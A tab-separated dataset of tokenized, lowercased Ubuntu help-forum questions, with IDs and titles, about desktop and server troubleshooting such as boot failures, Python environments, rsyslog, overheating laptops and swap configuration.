279850	vmplayer 5 : ca n't create vm from vmdk	yesterday i installed vmware player 5.0.2 from bundle file on a ubuntu 12.10 machine . then i created a vm containing winxp professional , this too went well . but when i looked for creating a new vm starting from the previous one , i ca n't find any option on vmplayer library that let me do it . no custom installation , no option to choose a vmdk to start from , as i read on some docs on internet . my copy of vmplayer seems to not offer these functions . i even tried to reinstall everything , running vm-installer -u vmplayer and then deleting the .vmware folder on home dirs . but after reinstall , something seems to be still persistent : at first run it automatically position the library on the folder where vm are saved . my question is : can i use vmplayer 5 to create vms starting from a previous vmdk ? if yes , why this option is not available ?
279853	`` permission denied '' error when editing /etc/ld.so.conf	when i run this command it fails : sudo echo '/usr/local/lib ' > > /etc/ld.so.conf bash : /etc/ld.so.conf : permission denied i do n't have any problem running sudo for other tasks . i am using ubuntu 12.04 . it works when connected as root . any help will be much appreciated
279854	how to open skype in one window 12.04 ?	how can i open skype like windows for example when we open skype on ubuntu it has multiple windows for contacts for current call for chat is it possible to open skype like we open skype on xp / 7 / 8 i.e in one window ?
279861	ubuntu 10.10 release-upgrade fails	just tried to upgrade my ubuntu 10.10 using `` do-release-upgrade '' from console and fails : error is : alex @ spse : / # do-release-upgrade checking for a new ubuntu release get:1 upgrade tool signature [ 198b ] get:2 upgrade tool [ 1306kb ] fetched 1307kb in 0s ( 0b/s ) authenticate 'natty.tar.gz ' against 'natty.tar.gz.gpg' exception from gpg : gnupg exited non-zero , with code 2 debug information : gpg : signature made mon jun 4 09:40:31 2012 edt using dsa key id 437d05b5 gpg : ca n't check signature : public key not found authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . alex @ spse : / # any ideas ? thanks , alex
279864	my laptop stuck after trying to install ubuntu	i was trying to install ubuntu from a disk on key to my laptop ( did it already on my desk top a few months ago ) i choose to install ubuntu in the options and then i got stuck on a purple background while the mouse cursor was active in that screen . after few minutes that nothing changed i shut down my computer , took out the disk on key and just wanted to run my computer ( had windows os ) but nothing worked no more , not even the basic screen of the computer when it restarts , when i put the disk on key back , and restarted the computer it just went stright back to that purple screen . what can i do to fix it ?
279866	python : module not found after manual install	i 've recently updated to the current version of ubuntu , 13.04 and python 2.7.4 . since then i have problems importing the gobject module and dunno what to do to fix it . i 'd like to use dreampie which currently fails at startup with the importerror below . here are more details : kiri : /home/kiri % uname -a linux megfigyelokocsi-2 3.8.0-17-generic # 27-ubuntu smp sun apr 7 19:39:35 utc 2013 x86_64 x86_64 x86_64 gnu/linux kiri : /home/kiri % sudo apt-get install python-gtk2 python-gobject python-gobject-2 reading package lists ... done building dependency tree reading state information ... done python-gobject-2 is already the newest version . python-gobject is already the newest version . python-gtk2 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . kiri : /home/kiri % python python 2.7.4 ( default , apr 9 2013 , 19:58:39 ) [ gcc 4.7.2 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import gobject traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named gobject i also did try to install dreampie from source before : git clone git : //github.com/noamraph/dreampie.git dreampie cd dreampie sudo python setup.py install installation succeeded but it did n't help . how can i make python recognize the gobject module ? edit : the module does exist at the following path , but importing still does not work : /usr/lib/python2.7/dist-packages/gobject/ edit2 : i already tried to fix my assumably corrupt python installation ( w/o success ) : sudo zsh apt-get remove -- purge python2.7-minimal apt-get remove -- purge python2.7 apt-get autoremove apt-get install python2.7-minimal apt-get install python2.7 also tried to upgrade my distribution , but it says everything 's up-to-date : sudo zsh apt-get clean & & apt-get update apt-get dist-upgrade apt-get upgrade edit 3 : sys.path : kiri : /home/kiri % python -c `` import sys ; print sys.path '' [ '' , '/usr/local/lib/python27.zip ' , '/usr/local/lib/python2.7 ' , '/usr/local/lib/python2.7/plat-linux2 ' , '/usr/local/lib/python2.7/lib-tk ' , '/usr/local/lib/python2.7/lib-old ' , '/usr/local/lib/python2.7/lib-dynload ' , '/usr/local/lib/python2.7/site-packages ' ]
279876	how do i remove video files that are stuck on the applications/places toolbar ?	moving some video files around i mistakenly pushed them onto the applications/places toolbar . there they stay . i ca n't get rid of them . ( ubuntu 12.04 lts ) /home/peter/pictures/screenshot from 2013-04-12 13:33:56.png
279878	how can i put a shortcut to nautilus with root privileges in the launcher ( ubuntu 12.10 ) ?	i do n't want to open the terminal and type sudo nautilus every time i want to visually browse for files . is there a way of fixing it to the launcher ?
279883	how to clean the print heads of my hp printer ?	i 've got laserjet p1005 that needs to have its print heads cleaned . hplip is installed with the gui but i do n't find an option to clean the print heads . i 'm on 12.04 64bit .
279887	logitech m570 not detected	my logitech m570 mouse does n't seem to be recognised in ubuntu 12.04 . it has worked the first time i plugged it in , and then only once since then when i unplugged the usb dongle and tried again . that seems to have been a 'one-off ' victory . any ideas on how to resolve this issue ? beginner 's instructions greatly appreciated ! : )
279889	os development on linux kernel	i am a computer science engineering student . i have currently taken up a project for developing an os for smart wheel chair ! since i dont want to go as deep as kernel development , i have decided to work on linux kernel and build my os on top of it . my question was , where do i find the emulators for intel x86 tablets so that the os i develop can be tested and debugged ? ?
279893	laptop suddenly rebooted	my laptop has rebooted suddenly without any warnings , but it has closed all programms , and killed all processes as if it was me who send it in reboot . the question is - where in logs can i see what caused the reboot ?
279897	how to disable write-cache for usb in ubuntu for safe yanking without `` eject '' or `` safely remove '' ?	in windows , i can edit the usb properties like in the following picture so i want to ask how can we edit the removal policy like that in ubuntu ?
279899	'file -- mime-type ' and 'mimetype ' commands returning different results	hi i am trying to work out why php is returning an 'msword ' file type when it should be 'excel ' so have tested on my ubuntu box using both the 'file ' and 'mimetype ' commands . as you can see from the results below they return different results . can anybody explain why ? root @ dev : ~ # file -- mime-type 1.xls 1.xls : application/msword root @ dev : ~ # mimetype 1.xls 1.xls : application/vnd.ms-excel i should also note the file in question is returning 'msword ' on a windows server . it was generated using phpexcel . thanks for your help .
279901	how can i reinstall ubuntu without internet connection	i was installing updates and ubuntu crashed . now i do n't have the internet connection anymore . how can i install ubuntu back without internet connection ?
279904	export http_proxy : where does the proxy setting get stored ?	today by mistake i had entered the following command in terminal with incorrect information export http_proxy= '' http : //usrname : passwrd @ host : port '' and then my internet connection was having trouble . in which file this export http_proxy information got stored ? thanks .
279906	grub fails to boot windows 7	i bought a packard bell dot s netbook last week . it came with windows 7 pre-installed , the microsoft tax . i wanted to install ubuntu 12.10 but the installation disk complained about something i forget what . the original installation , acording to ubuntu 11.10 installation cd was as below , but without the sda4-6 partitions and sda2 occupied the rest of the disk , 291 , xxx mib . as i understand things the original installation booted normaly from sda2 and if you wish to recover from the hard drive you press alt+f10 during start up and this starts `` packard bell recovery management '' , presumably from sda1 . i used gparted to reduce sada3 to 151 , xxx mib and then went ahead and installed ubuntu 11.10 . the resultant gparted view was as bellow . partition file system mount point label size used unused flags /dev/sda1 ntfs pqservice 13.00 gib 10.03 gib 2.97 gib dflag /dev/sda2 ntfs system reserved 100.00 mib 33.59 mib 66.41 mib boot /dev/sda3 ntfs packard bell 148.27 gib 21.3 gib 126.98 gib /dev/sda4 extended 136.72 gib /dev/sda5 ext4 / 135.73 gib 5.25 gib 130.48 gib /dev/sda6 linux swap 1011.00 mib the start up screen offers ubuntu 11.10 , a number of memory tests and last windows 7 on sda2 ! when i choose this option windows falls over . can anyone help ?
279909	a better input method for chinese in emacs ?	i would like to type chinese in emacs . i followed this link , and tried several input methods including chinese-py . it seems that , unlike normal ime of an operation system , it is not possible to type more than 1 character one time . we have to type character 1 by 1 , this is not convenient at all . does anyone have a solution ?
279910	unable to efi boot after ubuntu 12.10 install ( lenovo e30 )	basically the system won’t boot . after the bios screen i get the message : “error 1692 : no operating system found” i ran the ‘boot-repair’ utility without success . here is the boot info that utility generated : http : //paste.ubuntu.com/5695250/ everything looks correct as far as i can tell . i booted a livecd , mounted /dev/sda1 , and poked around the “efi” directory . everything looks correct in there also . here is a pastebin for the commands i ran there : http : //paste.ubuntu.com/5695339 does anyone have any idea how to fix this situation ? i 've been through all the options in the bios and nothing seems to help . i noticed this message from 'boot-repair' '' please do not forget to make your bios boot on sda1/efi/ubuntu/grubx64.efi file '' however , i do not see any options in the bios startup for selecting which option to boot from .
279911	lightdm creating problem with multiseat configuration with 2 graphics cards	i have multiscreen setup on my ubuntu machine with ubuntu12.10 , intel integrated hd grahics and nvidia geforce 210 . the lightdm version is 1.2.3 . i am facing two problems on the setup 1 ) on pressing ctrl-c the lightdm on seat-0 restarts . i searched on the internet and found out that this is a bug in lightdm package ( https : //bugs.launchpad.net/ubuntu/+bug/893590 ) . but i am not sure how to update the package as apt says that the package is newest . 2 ) after the system starts , on seat-1 there is a empty ubuntu background with no options on it . although if i explicitly start any application on that display ( :1 ) from seat-0 , it works fine . pasting lightdm.conf : [ seatdefaults ] autologin-guest=false autologin-session=lightdm-autologin greeter-session=unity-greeter user-session=ubuntu autologin-user=username [ lightdm ] minimum-display-number=0 minimum-vt=7 [ seat:0 ] xserver-layout=seat0 xserver-command=/usr/bin/x :0 -layout seat0 vt7 -novtswitch -sharevts [ seat:1 ] xserver-layout=seat1 xserver-command=/usr/bin/x :1 -layout seat1 vt8 -novtswitch -sharevts please take a look if there is anything missing in lightdm.conf to get this thing working
279912	is there a user-friendly setup to reduce performance and fan thresholds ?	my dell vostro 4450 with ubuntu 12.04 started heating ( > 95째c ) when its on heavy load and charging battery ( sometimes it freezes in this conditions ) . when on heavy load but using battery , it stabilize on 80째c . i also tested it on heavy load and charging battery win windows 7 and it was ok. is there a user-friendly strategy to reduce performance and fan thresholds in order to reduce temperature ?
279920	running dwsim failed	i am using ubuntu 12.10 with mono-complete installed . being a chemical engineer i required some 'process simulation ' application & i found it in dwsim . i used this . however it failed to ran with the following output : mono /home/usa/downloads/dwsim_mono_edit ... h_b4503_to_4606/dwsim.exe missing method system.type : :op_equality ( type , type ) in assembly /usr/lib/mono/2.0/mscorlib.dll , referenced in assembly /usr/lib/mono/gac/uiautomationprovider/3.0.0.0__31bf3856ad364e35/uiautomationprovider.dll error setting up uia : system.reflection.targetinvocationexception : exception has been thrown by the target of an invocation . -- - > system.typeinitializationexception : an exception was thrown by the type initializer for system.windows.automation.provider.automationinteropprovider -- - > system.missingmethodexception : method not found : 'system.type.op_equality ' . at system.windows.automation.provider.bridgemanager.getautomationbridges ( ) [ 0x00000 ] in < filename unknown > :0 at system.windows.automation.provider.automationinteropprovider..cctor ( ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at mono.uiautomation.winforms.formlistener.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at mono.uiautomation.winforms.global.initialize ( ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper managed-to-native ) system.reflection.monomethod : internalinvoke ( system.reflection.monomethod , object , object [ ] , system.exception & ) at system.reflection.monomethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at system.reflection.monomethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.methodbase.invoke ( system.object obj , system.object [ ] parameters ) [ 0x00000 ] in < filename unknown > :0 at system.windows.forms.application.initializeuiautomation ( ) [ 0x00000 ] in < filename unknown > :0 unhandled exception : system.typeloadexception : could not load type 'dwsim.formmain ' from assembly 'dwsim , version=2.1.4606.29773 , culture=neutral , publickeytoken=null ' . at dwsim.my.myproject+myforms.get_formmain ( ) [ 0x00000 ] in < filename unknown > :0 at dwsim.my.myapplication.oncreatemainform ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.visualbasic.applicationservices.windowsformsapplicationbase.onrun ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.visualbasic.applicationservices.windowsformsapplicationbase.run ( system.string [ ] commandline ) [ 0x00000 ] in < filename unknown > :0 at dwsim.my.myapplication.main ( system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0 [ error ] fatal unhandled exception : system.typeloadexception : could not load type 'dwsim.formmain ' from assembly 'dwsim , version=2.1.4606.29773 , culture=neutral , publickeytoken=null ' . at dwsim.my.myproject+myforms.get_formmain ( ) [ 0x00000 ] in < filename unknown > :0 at dwsim.my.myapplication.oncreatemainform ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.visualbasic.applicationservices.windowsformsapplicationbase.onrun ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.visualbasic.applicationservices.windowsformsapplicationbase.run ( system.string [ ] commandline ) [ 0x00000 ] in < filename unknown > :0 at dwsim.my.myapplication.main ( system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0
279926	rsyslog set 3 access points to log to same file ?	i 've been looking at examples of rsyslogs but most seems too programmer centric for me . i need 10.10.10.12 , 10.10.10.13 , 10.10.10.14 to get 1 shared log file . this gives me the log i want into my main /var/log/syslog $ modload imuxsock # provides support for local system logging $ modload imklog # provides kernel logging support ( previously done by rklogd ) # $ modload immark # provides -- mark -- message capability # provides udp syslog reception $ modload imudp $ udpserverrun 514 i tried adding this , but it did n't work . if $ fromhost-ip == '10.10.10.12 ' then /var/log/aps.log & ~ if $ fromhost-ip == '10.10.10.13 ' then /var/log/aps.log & ~ if $ fromhost-ip == '10.10.10.14 ' then /var/log/aps.log & ~ i updated my code with == as it makes more scene , but it did not fix the problem .
279930	problem when creating new partitions ?	i 've created a new disk partition by sudo fdisk /dev/xvda1 and the following commands : n p 1 enter enter w after , when i want to change the partition system file into xfs by sudo mkfs.xfs -i size=1024 /dev/xvda1p1 i got : /dev/xvda1p1 : not such file or directory p.s . : xvda1p1 is the name of the new created partition when i type sudo fdisk -l i 'm following these instructions in order to achieve a tutorial of creating a swift cluster . thanks .
279931	seperate /home on virtual installation	i currently have lubuntu 12.10 installed on my computer in a dual boot configuration with win 7 . i mostly access it by loading the linux partition with a mapped vmdk in virtualbox , but sometimes i do boot into it directly . i would like to move home to a separate partition . in order to back up this data along with the rest of my through windows without a lot of fuss , i would like to have /home in a virtual disk . the problem is that when i boot directly into linux , this virtual disk will not be available . with the way i use things , not having the normal home data available when booting directly into linux is not a problem , but i was n't sure what linux would do ? is it possible or advisable to create second /home partition that would be used for direct booting ?
279943	recursively apply the msgfmt command to all .po files in directory with find -exec	i have the following directory structure : webiste/ locale/ en/ lc_messages/ translation.po de/ lc_messages/ translation.po fr/ lc_messages/ translation.po i am using the find command to get to all the .po files and apply the msgfmt command to them . so when i run this command : find . -name \*.po the output is ./locale/fr/lc_messages/translation.po ./locale/de/lc_messages/translation.po ./locale/en/lc_messages/translation.po just as expected but now i when i add this : find . -name \*.po -exec msgfmt `` { } '' \ ; it outputs nothing and it does not create the .mo files it is supposed to ( if i do it to each file individually the msgfmt command works as expected ) . this is weird since if i change the command to this : find . -name *.po -exec echo `` { } '' \ ; it outputs the names of the files correctly . i 've sort of solved it like this : find . -name \*.po -exec msgfmt `` { } '' -o { } .mo \ ; but it outputs a translation.po.mo how can this be done ?
279944	need a simple , foolproof remote admin for ubuntu server	i 'm running an ubuntu server 12.10 box and need a foolproof remote admin for my wife/kids who have even less experience of linux than i . the box only runs as file server and our lan minecraft server . i do n't need a lot : ability to shutdown/reboot low profile ( it 's not a powerful box , i may be wrong but i understand that installing a gui is pretty wasteful in terms of resources ) possibly browser based ( we 'll be using it from many devices ) for myself i can ssh in but i 'd like the family to be able to do these simple things with a few clicks . thanks for your help !
279956	laptop overheating	i have a toshiba l500-128 laptop with ubuntu 12.04 64 bit os , the only problem i have is the overheating of my cpu , with temperatures from 70 to 90 c. i think that this is related to the usage of the cpu fan . how can i fix it ?
279959	how to create a virtualenv with python3.3 in ubuntu ?	i 'm running precise pangolin amd64 . i installed python 3.3 from ppa : fkrull/deadsnakes . now i want to actually use this new python version in a virtualenv . but how can i do this ? i get the following error : $ virtualenv -- no-site-packages -- distribute -p /usr/bin/python3.3 ~/.virtualenvs/pywork3 running virtualenv with interpreter /usr/bin/python3.3 the -- no-site-packages flag is deprecated ; it is now the default behavior . new python executable in /home2/username/.virtualenvs/pywork3/bin/python3.3 also creating executable in /home2/username/.virtualenvs/pywork3/bin/python traceback ( most recent call last ) : file `` /usr/local/lib/python2.7/site-packages/site.py '' , line 73 , in < module > __boot ( ) file `` /usr/local/lib/python2.7/site-packages/site.py '' , line 2 , in __boot import sys , imp , os , os.path importerror : no module named 'imp' error : the executable /home2/username/.virtualenvs/pywork3/bin/python3.3 is not functioning error : it thinks sys.prefix is '/home2/username/.virtualenvs ' ( should be '/home2/username/.virtualenvs/pywork3 ' ) error : virtualenv is not compatible with this system or executable if instead , i explicitly use python3.3 to call virtualenv , i get this error : $ python3.3 /usr/bin/virtualenv -- no-site-packages -- distribute -p /usr/bin/python3.3 ~/.virtualenvs/pywork3 traceback ( most recent call last ) : file `` /usr/bin/virtualenv '' , line 2 , in < module > import virtualenv importerror : no module named 'virtualenv' i 'm stuck . any help is greatly appreciated ! edit : following the advise by @ thefourtheye , i purged my local site-packages directory ( effectively only deleting site.py ) . now i 'm getting a step further , but virtualenv complains about a missing easy_install : error [ errno 2 ] no such file or directory : '/home2/username/.virtualenvs/pywork3/bin/easy_install ' while executing command /home2/username/.virt ... rk3/bin/easy_install /usr/share/python-virtualenv/pip-1.1.tar.gz i did install the package python3-setuptools , which installs the py3 version of easy_install . edit2 : here 's the verbose output , without explicitly passing -- distribute and -- no-site-packages , as these two switches are default behaviour of my virtualenv : $ virtualenv -- verbose -p /usr/bin/python3.3 ~/.virtualenvs/pywork3 running virtualenv with interpreter /usr/bin/python3.3 creating /home2/username/.virtualenvs/pywork3/lib/python3.3 symlinking python bootstrap modules symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/config-3.3m symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/lib-dynload symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/os.py ignoring built-in bootstrap module : posix symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/posixpath.py can not import bootstrap module : nt symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/ntpath.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/genericpath.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/fnmatch.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/locale.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/encodings symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/codecs.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/stat.py can not import bootstrap module : userdict can not import bootstrap module : copy_reg symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/types.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/re.py can not import bootstrap module : sre symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/sre_parse.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/sre_constants.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/sre_compile.py ignoring built-in bootstrap module : zlib can not import bootstrap module : _abcoll symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/warnings.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/linecache.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/abc.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/io.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/_weakrefset.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/copyreg.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/tempfile.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/random.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/__future__.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/collections symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/keyword.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/tarfile.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/shutil.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/struct.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/copy.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/base64.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/bisect.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/_dummy_thread.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/hashlib.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/heapq.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/hmac.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/reprlib.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/rlcompleter.py symlinking /home2/username/.virtualenvs/pywork3/lib/python3.3/weakref.py creating /home2/username/.virtualenvs/pywork3/lib/python3.3/site-packages writing /home2/username/.virtualenvs/pywork3/lib/python3.3/site.py writing /home2/username/.virtualenvs/pywork3/lib/python3.3/orig-prefix.txt writing /home2/username/.virtualenvs/pywork3/lib/python3.3/no-global-site-packages.txt creating parent directories for /home2/username/.virtualenvs/pywork3/include symlinking /home2/username/.virtualenvs/pywork3/include/python3.3m creating /home2/username/.virtualenvs/pywork3/bin new python executable in /home2/username/.virtualenvs/pywork3/bin/python3.3 changed mode of /home2/username/.virtualenvs/pywork3/bin/python3.3 to 0o755 also creating executable in /home2/username/.virtualenvs/pywork3/bin/python changed mode of /home2/username/.virtualenvs/pywork3/bin/python to 0o755 testing executable with /home2/username/.virtualenvs/pywork3/bin/python3.3 -c `` import sys prefix = sys.prefix if sys.version_info [ 0 ] == 3 : prefix = prefix.encode ( 'utf8 ' ) if hasattr ( sys.stdout , 'detach ' ) : sys.stdout = sys.stdout.detach ( ) elif hasattr ( sys.stdout , 'buffer ' ) : sys.stdout = sys.stdout.buffer sys.stdout.write ( prefix ) '' got sys.prefix result : '/home2/username/.virtualenvs/pywork3' creating /home2/username/.virtualenvs/pywork3/lib/python3.3/distutils writing /home2/username/.virtualenvs/pywork3/lib/python3.3/distutils/__init__.py writing /home2/username/.virtualenvs/pywork3/lib/python3.3/distutils/distutils.cfg using existing distribute egg : /usr/share/python-virtualenv/distribute-0.6.24.tar.gz installing distribute ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ..done . installing existing pip-1.1.tar.gz distribution : /usr/share/python-virtualenv/pip-1.1.tar.gz installing pip ... error [ errno 2 ] no such file or directory : '/home2/username/.virtualenvs/pywork3/bin/easy_install ' while executing command /home2/username/.virt ... rk3/bin/easy_install /usr/share/python-virtualenv/pip-1.1.tar.gz ... installing pip ... done . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/virtualenv.py '' , line 2283 , in < module > main ( ) file `` /usr/lib/python2.7/dist-packages/virtualenv.py '' , line 938 , in main never_download=options.never_download ) file `` /usr/lib/python2.7/dist-packages/virtualenv.py '' , line 1054 , in create_environment install_pip ( py_executable , search_dirs=search_dirs , never_download=never_download ) file `` /usr/lib/python2.7/dist-packages/virtualenv.py '' , line 643 , in install_pip filter_stdout=_filter_setup ) file `` /usr/lib/python2.7/dist-packages/virtualenv.py '' , line 976 , in call_subprocess cwd=cwd , env=env ) file `` /usr/lib/python3.3/subprocess.py '' , line 818 , in __init__ restore_signals , start_new_session ) file `` /usr/lib/python3.3/subprocess.py '' , line 1416 , in _execute_child raise child_exception_type ( errno_num , err_msg ) filenotfounderror : [ errno 2 ] no such file or directory : '/home2/username/.virtualenvs/pywork3/bin/easy_install'
279960	help using awk to change a file	i am using awk to simply change some text in a file , while maintaining the values as they are currently in the file . the problem is a few of the values are changing . the values are maintained if i use % f - however , i would like to eliminate the unnecessary trailing zero 's . this is accomplished for most values when using % g , but % g causes a few of the values to convert to scientific numbers , which i do not want . is there a way to both print the numbers to the new file without the trailing zero 's as well as not convert any numbers to scientific notation ? examples : when i apply the following to the file i am changing , using % f : ( rline == 4 ) { printf ( `` % f\t % s\n '' , $ 1 , '' gsurf_intercept '' ) } it results in : 1000000.000000 gsurf_intercept when i use the % g option : ( rline == 4 ) { printf ( `` % g\t % s\n '' , $ 1 , '' gsurf_intercept '' ) } it results in : 1e+06 gsurf_intercept what i want is : 1000000 gsurf_intercept also , i applying this to 70 lines in the file i 'm changing , and i would like the resulting file to produce two columns , each column in alignment . i find that not each item lines up with the one above or below - this happens when the item in the first column is a string and i use % s for it .
279969	how website name get resolved ?	i 'm using internet via a usb datacard on ubuntu 12.04 . i never configure domain name server . my question is how website name get resolved ? is there a inbuilt domain name server in system ? if not than how are website name get resolved ? what happen inside a system when i type a name of website and press enter ? i do n't have any router than what is my default gateway ? please explain me the complete process .
279971	how to add support for new services to friends ?	with the new friends-app landing in ubuntu , it occurred to me that adding support for instagram in the timeline would be cool . i also thought i might take a stab at it myself , but i 'm having a hard time finding any documentation . is there a spec describing what is needed from each protocol ? how does auth work ? would support need to be added to ubuntu-online-accounts first or is there a way for friends to register the new protocol ? it 's very new and has a very hard to google name , so any pointers in the right direction would be appreciated .
279973	how do i debootstrap on a local repository	i have a local ubuntu repository generated with apt-mirror . can i use this with debootstrap ? deb http : //myrepo/mirror/archive.ubuntu.com/ubuntu precise main restricted multiverse universe deb http : //myrepo/mirror/archive.ubuntu.com/ubuntu precise-security main restricted multiverse universe deb http : //myrepo/mirror/archive.ubuntu.com/ubuntu precise-updates main restricted multiverse universe debootstrap -- arch=amd64 precise chroot
279977	why this launcher button contains two applications ?	please take a look at this launcher button . when i hover the mouse on it , it shows the name of libreoffice calc . if i right click on it , it shows two applications , new spreadsheet and terminal if simply click on the launcher , a new terminal appears . this never starts libreoffice calc . i can start libreoffice only if i right click on it and then select and click new spreadsheet . moreover , as you can see , it shows an option to lock to launcher . but nothing happens ( change to unlock like others ) when this option is selected . i am utterly surprised since i do not remember changing anything special except regular updates . other launcher buttons are fine . could you please tell me how do i debug this problem ?
279983	update manager keeps crashing but apt-get and aptitude is working	since december last year i already got problems with the update manager it keeps crashing right from starting it , i already sended the crash report multiple times and searching the internet and this forum for fixes but nothing worked . the apt-get and aptitude is working fine in the terminal .
279986	does installing ubuntu 12.10 with 'erase win7 ' option deletes windows partitions ?	i had win 7 in c : \ and other data in f : \ g : \ h : \ partitions . installed ubuntu 12.10 with option erase win7 and install ubuntu and checked lvm option . after installing ubuntu i 'm not able to see f : \ g : \ h : \ partitions . does this mean i lost all data on f : \ g : \ h : \ or is there any way to recover ?
279994	how to configure surround sound audio using three 3.5mm jacks as output ?	i 've been using ubuntu for some time now but only after i got a new 5.1 speaker system , has this began to create a problem . i am using an asrock n68c-gs ucc motherboard with on-board audio and faced a similar issue on windows 7 . the drivers that came with the motherboard only supported stereo sound , as the rear jacks are only speakers , line-in and mic . i somehow managed to download and install a different set of drivers from via audio . i could find a solution to this on ubuntu however . i 'm currently running a daily build of 13.04 . in the sound setting , selecting analogue surround 5.1 output changes nothing as the 2 other jack are still recognised and rear mic and line-in in the input section .
280000	unable to activate matlab	i have a problem with the matlab ( 2012a student version ) activation . the following message pops up when i try to activate : error 1,714 : unable to activate your machine . the activation process can not detect a valid host id which utilizes the 'eth ' naming convention . please refer to the following solution id , to help resolve this issue : 1-661qjd i refered to the solution id on the mathworks page . their way to solve the problem is to rename the eth device in the /etc/udev/rules.d/70-persistent-net.rules file by doing the following : simply replace the name in the name= field to be eth0 and reboot the machine . once rebooted , the machine should now have an eth0 device . the problem is , that the device in my persistent net rules file is already called eth0 . i have a dell xps netbook ( and ubuntu 12.10 on it ) which has only wifi ( i read somewhere that netbooks dont have an ethn device , which i guess is part of the problem ) .
280009	how do i position widgets next to each other in glade ?	how can i make 2 widgets ( or more ) stand next to each other in glade . for example a textbar and a toolbar .
280014	is swap enabled on this server ? should it be ?	we have a sysadmin configure a couple of servers at digitalocean . to me , it looks like swap was n't enabled on this but it 's been a very long time since i 've had to do things like this . it 's a rails app and the only reason this came up is because we were getting out of memory errors . is a swap partition still considered a best practice for a modern ( 3.2.13 rails app ) ? i 'd imagine so . is there a simple fix to creating a swap partition from the command line ( host has 2gb of ram ) ? not asking to do it but some guidance would be appreciated . i 'm fine with just upgrading to a 1gb of memory server which is only $ 5 / month more . deploy @ x1 : ~ $ sudo fdisk -l disk /dev/sda : 42.9 gb , 42949672960 bytes 255 heads , 63 sectors/track , 5221 cylinders , total 83886080 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sda does n't contain a valid partition table deploy @ x1 : ~ $ alos should i be concerned about the last line regarding not containing a valid partition table ?
